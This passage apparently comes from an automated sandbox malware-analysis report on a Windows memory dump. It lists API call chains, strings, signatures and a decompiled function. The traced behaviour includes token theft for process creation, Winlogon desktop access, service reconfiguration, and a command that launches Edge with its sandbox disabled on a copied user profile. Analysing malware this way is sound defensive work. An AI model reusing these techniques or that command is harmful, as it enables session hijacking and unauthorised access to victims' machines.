                                                                                      • Part of subcall function 04EC7390: FindFirstFileW.KERNEL32(?,?), ref: 04EC741C
                                                                                      • Part of subcall function 04EC7390: lstrcpyW.KERNEL32 ref: 04EC7463
                                                                                      • Part of subcall function 04EC7390: lstrcatW.KERNEL32(?,04EFC92C), ref: 04EC7475
                                                                                      • Part of subcall function 04EC7390: lstrcatW.KERNEL32(?,?), ref: 04EC7485
                                                                                      • Part of subcall function 04EC7390: lstrcpyW.KERNEL32 ref: 04EC74AA
                                                                                      • Part of subcall function 04EC7390: lstrcatW.KERNEL32(?,04EFC92C), ref: 04EC74BC
                                                                                      • Part of subcall function 04EC7390: lstrcatW.KERNEL32(?,?), ref: 04EC74CC
                                                                                      • Part of subcall function 04EC7390: lstrcmpW.KERNEL32(?,04EFC940), ref: 04EC74E3
                                                                                      • Part of subcall function 04EC7390: lstrcmpW.KERNEL32(?,04EFC944), ref: 04EC74F5
                                                                                    • wsprintfW.USER32 ref: 04EB69DB
                                                                                      • Part of subcall function 04EC72A0: LoadLibraryA.KERNEL32(Wtsapi32.dll), ref: 04EC72E9
                                                                                      • Part of subcall function 04EC72A0: GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 04EC72F9
                                                                                      • Part of subcall function 04EC72A0: CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 04EC7316
                                                                                      • Part of subcall function 04EC72A0: CreateProcessAsUserW.ADVAPI32(?,00000000,04EB6928,00000000,00000000,00000000,00000400,?,00000000,00000044,?), ref: 04EC7346
                                                                                      • Part of subcall function 04EC72A0: DestroyEnvironmentBlock.USERENV(?), ref: 04EC7354
                                                                                    Strings
                                                                                    • %s%s, xrefs: 04EB69AB
                                                                                    • cmd.exe /c start msedge.exe --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir="%, xrefs: 04EB69D5
                                                                                    • \AppData\Local\Microsoft\Edge\User Data, xrefs: 04EB6989
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$Createlstrcpy$AddressBlockDirectoryEnvironmentLibraryLoadProcUserlstrcmpwsprintf$CloseDestroyErrorFileFindFirstHandleLastProcessProfile
                                                                                    • String ID: %s%s$\AppData\Local\Microsoft\Edge\User Data$cmd.exe /c start msedge.exe --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir="%
                                                                                    • API String ID: 354288507-1065409233
                                                                                    • Opcode ID: c660c6595d35d0daf0f30e24f232eeacd905e4315f80b0b9e5b50990c72cb19a
                                                                                    • Instruction ID: 7cdf41a5a7efcab69d858ed09e33523349b2150361945f1d4520703d71db4a27
                                                                                    • Opcode Fuzzy Hash: c660c6595d35d0daf0f30e24f232eeacd905e4315f80b0b9e5b50990c72cb19a
                                                                                    • Instruction Fuzzy Hash: 8A2196B1D4010E97CB24EF60DD449DEF3B8FF54304F4051E6A90993040EB30AA99CFA5
                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 95%
                                                                                    			E04EDE281(void* __ecx) {
                                                                                    				void* _t4;
                                                                                    				void* _t11;
                                                                                    				void* _t16;
                                                                                    				long _t25;
                                                                                    				void* _t28;
                                                                                    
                                                                                    				if( *0x4f03010 != 0xffffffff) {
                                                                                    					_t25 = GetLastError();
                                                                                    					_t11 = E04EDE57E(__eflags,  *0x4f03010);
                                                                                    					__eflags = _t11 - 0xffffffff;
                                                                                    					if(_t11 == 0xffffffff) {
                                                                                    						L5:
                                                                                    						_t11 = 0;
                                                                                    					} else {
                                                                                    						__eflags = _t11;
                                                                                    						if(__eflags == 0) {
                                                                                    							_t4 = E04EDE5B8(__eflags,  *0x4f03010, 0xffffffff);
                                                                                    							_pop(_t16);
                                                                                    							__eflags = _t4;
                                                                                    							if(_t4 != 0) {
                                                                                    								_t28 = E04EE81E1(_t16, 1, 0x28);
                                                                                    								__eflags = _t28;
                                                                                    								if(__eflags == 0) {
                                                                                    									L8:
                                                                                    									_t11 = 0;
                                                                                    									E04EDE5B8(__eflags,  *0x4f03010, 0);
                                                                                    								} else {
                                                                                    									__eflags = E04EDE5B8(__eflags,  *0x4f03010, _t28);
                                                                                    									if(__eflags != 0) {
                                                                                    										_t11 = _t28;
                                                                                    										_t28 = 0;
                                                                                    										__eflags = 0;
                                                                                    									} else {
                                                                                    										goto L8;
                                                                                    									}
                                                                                    								}
                                                                                    								E04EE8159(_t28);
                                                                                    							} else {
                                                                                    								goto L5;
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    					SetLastError(_t25);
                                                                                    					return _t11;
                                                                                    				} else {
                                                                                    					return 0;
                                                                                    				}
                                                                                    			}

                                                                                    0x04ede288
                                                                                    0x04ede29b
                                                                                    0x04ede2a2
                                                                                    0x04ede2a5
                                                                                    0x04ede2a8
                                                                                    0x04ede2c1
                                                                                    0x04ede2c1
                                                                                    0x04ede2aa
                                                                                    0x04ede2aa
                                                                                    0x04ede2ac
                                                                                    0x04ede2b6
                                                                                    0x04ede2bc
                                                                                    0x04ede2bd
                                                                                    0x04ede2bf
                                                                                    0x04ede2cf
                                                                                    0x04ede2d3
                                                                                    0x04ede2d5
                                                                                    0x04ede2e9
                                                                                    0x04ede2e9
                                                                                    0x04ede2f2
                                                                                    0x04ede2d7
                                                                                    0x04ede2e5
                                                                                    0x04ede2e7
                                                                                    0x04ede2fb
                                                                                    0x04ede2fd
                                                                                    0x04ede2fd
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ede2e7
                                                                                    0x04ede300
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ede2bf
                                                                                    0x04ede2ac
                                                                                    0x04ede308
                                                                                    0x04ede312
                                                                                    0x04ede28a
                                                                                    0x04ede28c
                                                                                    0x04ede28c

                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(00000001,?,04EDD7F5,04ED586D,04ED5D10,?,04ED5F20,?,00000001,?,?,00000001,?,04F00550,0000000C,04ED6009), ref: 04EDE28F
                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 04EDE29D
                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 04EDE2B6
                                                                                    • SetLastError.KERNEL32(00000000,04ED5F20,?,00000001,?,?,00000001,?,04F00550,0000000C,04ED6009,?,00000001,?), ref: 04EDE308
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                    • String ID:
                                                                                    • API String ID: 3852720340-0
                                                                                    • Opcode ID: 203332361834ad6a8ea92f1d6d31ebb282cbe9f912445d1e7e405549d5555881
                                                                                    • Instruction ID: 716372123871d67365a2de15927c54e9048540f04908678025f795cbbe256368
                                                                                    • Opcode Fuzzy Hash: 203332361834ad6a8ea92f1d6d31ebb282cbe9f912445d1e7e405549d5555881
                                                                                    • Instruction Fuzzy Hash: 2701D83260AA155EB7242FBDBC8D7763A48FB4167DB20232AF9245D1D0FE16AC826150
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 04EC0BB1
                                                                                    • GetProcAddress.KERNEL32(00000000,RegRenameKey), ref: 04EC0BC7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: Advapi32.dll$RegRenameKey
                                                                                    • API String ID: 2574300362-2310806928
                                                                                    • Opcode ID: 65c8db4022fbe9da9a3d90e1dd8c6c1a90e2c169b4247d49cc3002afe4f60e97
                                                                                    • Instruction ID: 72e47da04a23d46ecde74c61eabb1f6dfe2b69d146d1fd6ae21210ac917f21f2
                                                                                    • Opcode Fuzzy Hash: 65c8db4022fbe9da9a3d90e1dd8c6c1a90e2c169b4247d49cc3002afe4f60e97
                                                                                    • Instruction Fuzzy Hash: CB01DB32B4121CBB8F119FA6BD05CAEBF7DEF85667B104195FD0DD2100D6329E119690
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,04EC3B78), ref: 04EC38C2
                                                                                    • OpenServiceW.ADVAPI32(00000000,?,000F01FF,?,?,?,?,?,04EC3B78), ref: 04EC38D5
                                                                                    • LockServiceDatabase.ADVAPI32(00000000), ref: 04EC38E2
                                                                                    • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000003,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,000F01FF), ref: 04EC38FD
                                                                                    • UnlockServiceDatabase.ADVAPI32(?), ref: 04EC3908
                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,000F01FF,?,?,?,?,?,04EC3B78), ref: 04EC390F
                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,000F01FF,?,?,?,?,?,04EC3B78), ref: 04EC3916
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Service$CloseDatabaseHandleOpen$ChangeConfigLockManagerUnlock
                                                                                    • String ID:
                                                                                    • API String ID: 2762133943-0
                                                                                    • Opcode ID: 7471350e7aca516aba4ddb14b308baa5288249dc67d1cb8a6e82b50ba85386c0
                                                                                    • Instruction ID: bb194ebbbe50e0ff88758d1c450d9667184650171fe907760085ead084536661
                                                                                    • Opcode Fuzzy Hash: 7471350e7aca516aba4ddb14b308baa5288249dc67d1cb8a6e82b50ba85386c0
                                                                                    • Instruction Fuzzy Hash: FCF06831702655B7971117A79D4CD6BFA7CDBC57A3710021AFE15E2289DE78CD018570
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,04EC3B6F), ref: 04EC3842
                                                                                    • OpenServiceW.ADVAPI32(00000000,?,000F01FF,?,?,?,?,?,04EC3B6F), ref: 04EC3855
                                                                                    • LockServiceDatabase.ADVAPI32(00000000), ref: 04EC3862
                                                                                    • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000002,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,000F01FF), ref: 04EC387D
                                                                                    • UnlockServiceDatabase.ADVAPI32(?), ref: 04EC3888
                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,000F01FF,?,?,?,?,?,04EC3B6F), ref: 04EC388F
                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,000F01FF,?,?,?,?,?,04EC3B6F), ref: 04EC3896
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Service$CloseDatabaseHandleOpen$ChangeConfigLockManagerUnlock
                                                                                    • String ID:
                                                                                    • API String ID: 2762133943-0
                                                                                    • Opcode ID: 830190eac3b9d9cedebc14edb8a3467991dc0dfb75089ffffac205c5e2dc13a2
                                                                                    • Instruction ID: 6bf22b4c5b087bd25904da386790248a53e86a99ba03be87b4ddecb4e3837a27
                                                                                    • Opcode Fuzzy Hash: 830190eac3b9d9cedebc14edb8a3467991dc0dfb75089ffffac205c5e2dc13a2
                                                                                    • Instruction Fuzzy Hash: 5EF0AF32302355BB871127A7AD4CC6BBA7CDBC67A2700026AFE15D2285DE68DC018670
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • SetLastError.KERNEL32(0000139F), ref: 04ED19A1
                                                                                    • TryEnterCriticalSection.KERNEL32(?,?), ref: 04ED19B3
                                                                                    • SetLastError.KERNEL32(0000139F), ref: 04ED19C8
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 04ED19CF
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalErrorLastSection$EnterLeave
                                                                                    • String ID:
                                                                                    • API String ID: 2124651672-0
                                                                                    • Opcode ID: 0d199e17b2a179efd50ef7b8a92e84c4d2c11bd45da45c5bc57c5e1711f6ccb2
                                                                                    • Instruction ID: 6aa2679c8f6f3591e861be0fc865a60f6670cc54c9cc351dc3878edf7ec0fcd1
                                                                                    • Opcode Fuzzy Hash: 0d199e17b2a179efd50ef7b8a92e84c4d2c11bd45da45c5bc57c5e1711f6ccb2
                                                                                    • Instruction Fuzzy Hash: 1A012532300210DBD320A7AAE4489AAF7E9DBD5726F00452BF916D5544CA75F842D665
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 04EC56A2
                                                                                    • GetThreadDesktop.USER32(00000000,?,?,04EC1D6B), ref: 04EC56A9
                                                                                    • OpenDesktopA.USER32(Winlogon,00000000,00000000,400001CF), ref: 04EC56BF
                                                                                      • Part of subcall function 04EC5620: GetCurrentThreadId.KERNEL32 ref: 04EC5637
                                                                                      • Part of subcall function 04EC5620: GetThreadDesktop.USER32(00000000,?,00000000), ref: 04EC563E
                                                                                      • Part of subcall function 04EC5620: GetUserObjectInformationW.USER32(00000000,00000002,?,00000100,?,?,00000000), ref: 04EC565C
                                                                                    • CloseDesktop.USER32(00000000,?,?,04EC1D6B), ref: 04EC56D7
                                                                                    • PostMessageW.USER32(0000FFFF,00000312,00000000,002E0003), ref: 04EC56F3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: DesktopThread$Current$CloseInformationMessageObjectOpenPostUser
                                                                                    • String ID: Winlogon
                                                                                    • API String ID: 3882203166-744610081
                                                                                    • Opcode ID: d3ea80579c875cee19bd6b3291298af2efcbe551bb28309a345fc1f56c612443
                                                                                    • Instruction ID: e41e319bd4dae840ca9ca63444a892f2977798f1058021d15d240788d68d10c2
                                                                                    • Opcode Fuzzy Hash: d3ea80579c875cee19bd6b3291298af2efcbe551bb28309a345fc1f56c612443
                                                                                    • Instruction Fuzzy Hash: 6CF0273234022037E7222775BD09FEE2615CFC0B62F140828F901DB1C4DB98BC830354
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,04EE7BE8,04EE7BE8,?,?,?,04EEC3B9,00000001,00000001,44E85006), ref: 04EEC1C2
                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,04EEC3B9,00000001,00000001,44E85006,?,?,?), ref: 04EEC248
                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,44E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 04EEC342
                                                                                    • __freea.LIBCMT ref: 04EEC34F
                                                                                      • Part of subcall function 04EE8193: HeapAlloc.KERNEL32(00000000,00000001,00000004,?,04EE91A3,00000001,00000000,?,04EE13EE,00000001,00000004,00000000,00000001,?,?,04EE0FAC), ref: 04EE81C5
                                                                                    • __freea.LIBCMT ref: 04EEC358
                                                                                    • __freea.LIBCMT ref: 04EEC37D
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide__freea$AllocHeap
                                                                                    • String ID:
                                                                                    • API String ID: 3147120248-0
                                                                                    • Opcode ID: a29da7de400e30c02d97c019e5bb70b29b57b1868a3ec50c67f939c7b2aaa391
                                                                                    • Instruction ID: 6469b8f44a412f1cf3d53fc2ac112d2217d0846c8668d0943db8f8abfcd29aa8
                                                                                    • Opcode Fuzzy Hash: a29da7de400e30c02d97c019e5bb70b29b57b1868a3ec50c67f939c7b2aaa391
                                                                                    • Instruction Fuzzy Hash: 1351EF72610606AFEB258F66CC41EBF77AAEB44758F285669FD18D7140EB34FC40C6A0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 04ED32F7
                                                                                    • HeapFree.KERNEL32(?,00000000,?,?,?,00000000,?,04ED31A8,?,?,?,?,00000000), ref: 04ED3320
                                                                                      • Part of subcall function 04ED2560: EnterCriticalSection.KERNEL32(00000054,?,?,00000000,00000000), ref: 04ED2599
                                                                                      • Part of subcall function 04ED2560: EnterCriticalSection.KERNEL32(-0000006C), ref: 04ED259F
                                                                                    • HeapFree.KERNEL32(?,00000000,?,?,00000000,00000001,00000000,00000000,?,?,00000000,?,04ED31A8,?,?,?), ref: 04ED3368
                                                                                    • InterlockedExchangeAdd.KERNEL32(00000040,?), ref: 04ED33C1
                                                                                      • Part of subcall function 04ED1D90: SetLastError.KERNEL32(00000000,?,00000000,?,?,?,04ED3414,00000000,?,?,04ED31A8,?,?,?,?,00000000), ref: 04ED1DAD
                                                                                      • Part of subcall function 04ED1D90: InterlockedDecrement.KERNEL32(00000028), ref: 04ED1E26
                                                                                      • Part of subcall function 04ED1D90: HeapFree.KERNEL32(?,00000000,00000000,00000000,?,04ED3414,00000000,?,?,04ED31A8,?,?,?,?,00000000), ref: 04ED1E47
                                                                                    • InterlockedExchangeAdd.KERNEL32(00000044,?), ref: 04ED33DF
                                                                                    • InterlockedExchangeAdd.KERNEL32(00000044,?), ref: 04ED3405
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Interlocked$ExchangeFreeHeap$CriticalDecrementEnterSection$ErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 1561599947-0
                                                                                    • Opcode ID: 7c04b7a7002e83428e6fc251b4b8c0f7bbd96f095f3e3ec00580e382e35fa37a
                                                                                    • Instruction ID: a6029d4d0aa3c3e67b40dcdd9eb04e8306cf816557b6ea198d139610bd82204e
                                                                                    • Opcode Fuzzy Hash: 7c04b7a7002e83428e6fc251b4b8c0f7bbd96f095f3e3ec00580e382e35fa37a
                                                                                    • Instruction Fuzzy Hash: 1841B037600214ABDB249FA9ED48EAB776CFF85329B00522AFA06D7550CA35F816C761
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • WSARecv.WS2_32(?,-0000001B,00000001,00000001,?,00000000,00000000), ref: 04ED5361
                                                                                    • WSAGetLastError.WS2_32(?,?,?,?,?,00000001,00000000,?,?,?,04ED25F2), ref: 04ED536C
                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000001,00000000,?,?,?,04ED25F2), ref: 04ED539C
                                                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,?,00000001,00000000,?,?,?,04ED25F2), ref: 04ED53AA
                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,00000001,00000000,?,?,?,04ED25F2), ref: 04ED53C9
                                                                                    • HeapFree.KERNEL32(?,00000000,00000001,00000001,?,?,?,?,?,?,?,?,00000001,00000000,?,?), ref: 04ED5454
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalErrorLastSection$EnterFreeHeapLeaveRecv
                                                                                    • String ID:
                                                                                    • API String ID: 4219686125-0
                                                                                    • Opcode ID: e2391f210a2c78e99d603cb0f70cde38ef5c2eb897830e587902dae32f0a4ec3
                                                                                    • Instruction ID: dffad95e7b4836b8cd337c5c2b15b5b8099806e2b19058e6857ec8ac45824618
                                                                                    • Opcode Fuzzy Hash: e2391f210a2c78e99d603cb0f70cde38ef5c2eb897830e587902dae32f0a4ec3
                                                                                    • Instruction Fuzzy Hash: 42518F71A00215EFDB20CF59C884BBEBBB5FF88315F54506AE906AB284D774A942CB61
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 04ECEDEC
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 04ECEDF0
                                                                                    • WSAWaitForMultipleEvents.WS2_32(00000004,?,00000000,000000FF,00000000,?,00000000), ref: 04ECEE7C
                                                                                    • WSAGetLastError.WS2_32(?,00000000), ref: 04ECEECE
                                                                                      • Part of subcall function 04ECF250: EnterCriticalSection.KERNEL32(?), ref: 04ECF284
                                                                                      • Part of subcall function 04ECF250: LeaveCriticalSection.KERNEL32(?), ref: 04ECF2DB
                                                                                      • Part of subcall function 04ECF250: HeapFree.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 04ECF31F
                                                                                      • Part of subcall function 04ECF250: EnterCriticalSection.KERNEL32(?,?,00000000), ref: 04ECF331
                                                                                      • Part of subcall function 04ECF250: LeaveCriticalSection.KERNEL32(?), ref: 04ECF370
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 04ECEEFD
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 04ECEF20
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalCurrentSectionThread$EnterLeave$ErrorEventsFreeHeapLastMultipleWait
                                                                                    • String ID:
                                                                                    • API String ID: 2095029031-0
                                                                                    • Opcode ID: 6ed40efc4aaa2e23427393e75e9d4996101c43a425fff063b874da5e3031c48e
                                                                                    • Instruction ID: 4de04792165892e599d122b7b5b4072d98d69073375b380a71389d303846a4cb
                                                                                    • Opcode Fuzzy Hash: 6ed40efc4aaa2e23427393e75e9d4996101c43a425fff063b874da5e3031c48e
                                                                                    • Instruction Fuzzy Hash: C6413670600614DFEB24DF28CA84BAEB7E4EF48358F101A1DE946D7280DB75F906CB95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • getsockopt.WS2_32(?,0000FFFF,00001001,?,00000000), ref: 04ED4426
                                                                                    • InterlockedCompareExchange.KERNEL32(00000000,00000000,00000001), ref: 04ED446C
                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 04ED447F
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 04ED448B
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 04ED44C1
                                                                                    • PostQueuedCompletionStatus.KERNEL32(?,000000F3,00000001,00000000), ref: 04ED44E2
                                                                                      • Part of subcall function 04ED4680: InterlockedExchangeAdd.KERNEL32(?,00004E20), ref: 04ED470B
                                                                                      • Part of subcall function 04ED4680: WSASend.WS2_32(?,00004E20,00000001,?,00000000,?,00000000), ref: 04ED473E
                                                                                      • Part of subcall function 04ED4680: WSAGetLastError.WS2_32 ref: 04ED4749
                                                                                      • Part of subcall function 04ED4680: InterlockedDecrement.KERNEL32(00000002), ref: 04ED4759
                                                                                      • Part of subcall function 04ED4680: HeapFree.KERNEL32(?,00000000,?,?), ref: 04ED4789
                                                                                      • Part of subcall function 04ED2560: EnterCriticalSection.KERNEL32(00000054,?,?,00000000,00000000), ref: 04ED2599
                                                                                      • Part of subcall function 04ED2560: EnterCriticalSection.KERNEL32(-0000006C), ref: 04ED259F
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterInterlocked$ExchangeLeave$CompareCompletionDecrementErrorFreeHeapLastPostQueuedSendStatusgetsockopt
                                                                                    • String ID:
                                                                                    • API String ID: 2014370420-0
                                                                                    • Opcode ID: d8b4ba2894f4f3c3ec89dc248d1e2c15f60dc8062829c3f11faa772b46c7c59e
                                                                                    • Instruction ID: f95a8c96ea843e54e16f4875025bf44ab80f011c13b0e8973c07dc58a9b43974
                                                                                    • Opcode Fuzzy Hash: d8b4ba2894f4f3c3ec89dc248d1e2c15f60dc8062829c3f11faa772b46c7c59e
                                                                                    • Instruction Fuzzy Hash: BB31E371A00109BFEB25DFA4D884ABEF378FF55319F40512AEA11961C0CBB5B952CF80
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • timeGetTime.WINMM ref: 04ED3545
                                                                                    • EnterCriticalSection.KERNEL32(00000054,?,?,?,?,?,04ED339E,?,00000000,?,?,?,00000000,?,04ED31A8), ref: 04ED3567
                                                                                    • SetLastError.KERNEL32(00000000,?,04ED339E,?,00000000,?,?,?,00000000,?,04ED31A8,?,?,?,?,00000000), ref: 04ED3575
                                                                                    • LeaveCriticalSection.KERNEL32(00000054,?,04ED339E,?,00000000,?,?,?,00000000,?,04ED31A8,?,?,?,?,00000000), ref: 04ED3591
                                                                                    • GetLastError.KERNEL32 ref: 04ED35F5
                                                                                    • HeapFree.KERNEL32(?,00000000,?,?), ref: 04ED362A
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalErrorLastSection$EnterFreeHeapLeaveTimetime
                                                                                    • String ID:
                                                                                    • API String ID: 340097737-0
                                                                                    • Opcode ID: 49463f91752e307be8bb3dafdf27574eae7f7857f208bf52c5036b863e977d4f
                                                                                    • Instruction ID: 8e2589e30da2a6ea40e72453f7c74f13250a2fd840e20f0bf65113f4f3a77a86
                                                                                    • Opcode Fuzzy Hash: 49463f91752e307be8bb3dafdf27574eae7f7857f208bf52c5036b863e977d4f
                                                                                    • Instruction Fuzzy Hash: 88318F75A00205EBDB14DF15C888BAAB7A9FF48315F54502AFD19D7280DB34FD16CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • WSAEventSelect.WS2_32(?,?,00000023), ref: 04ECDF18
                                                                                    • WSAGetLastError.WS2_32(?,04ECDE23,00000010), ref: 04ECDF23
                                                                                    • SetLastError.KERNEL32(00000000,?,04ECDE23,00000010), ref: 04ECDF58
                                                                                    • send.WS2_32(?,00000000,00000000,00000000), ref: 04ECDF73
                                                                                    • WSAGetLastError.WS2_32(?,04ECDE23,00000010), ref: 04ECDF7E
                                                                                    • GetLastError.KERNEL32(?,04ECDE23,00000010), ref: 04ECDF99
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$EventSelectsend
                                                                                    • String ID:
                                                                                    • API String ID: 259408233-0
                                                                                    • Opcode ID: 4eb2006be2914f6497329cb673e168aded459a7f2b06b0a7e2e325e891325585
                                                                                    • Instruction ID: ccabe57c3437619c4c1b65cc959ab2d7cecbb9c956be64714e07601ffd1ec605
                                                                                    • Opcode Fuzzy Hash: 4eb2006be2914f6497329cb673e168aded459a7f2b06b0a7e2e325e891325585
                                                                                    • Instruction Fuzzy Hash: 08215E712007409FE7309F65E848B56BBE5FB44319F104A2DE656C66D0C3B6E4548B90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • RaiseException.KERNEL32(C000001D,00000001,00000000,00000000,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04EB7ACE
                                                                                    • EnterCriticalSection.KERNEL32(?,00000004,?,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04ECF693
                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04ECF6BB
                                                                                    • SetLastError.KERNEL32(0000139F,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04ECF6C7
                                                                                      • Part of subcall function 04ECF710: SetEvent.KERNEL32(?,?,?,?,?,04ECF6B1,00000000,00000000,?,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000), ref: 04ECF76C
                                                                                    • SetLastError.KERNEL32(0000139F,?,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04ECF6DF
                                                                                    • SetLastError.KERNEL32(00000057,74E5F5E0,?,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04ECF6F7
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$CriticalSection$EnterEventExceptionLeaveRaise
                                                                                    • String ID:
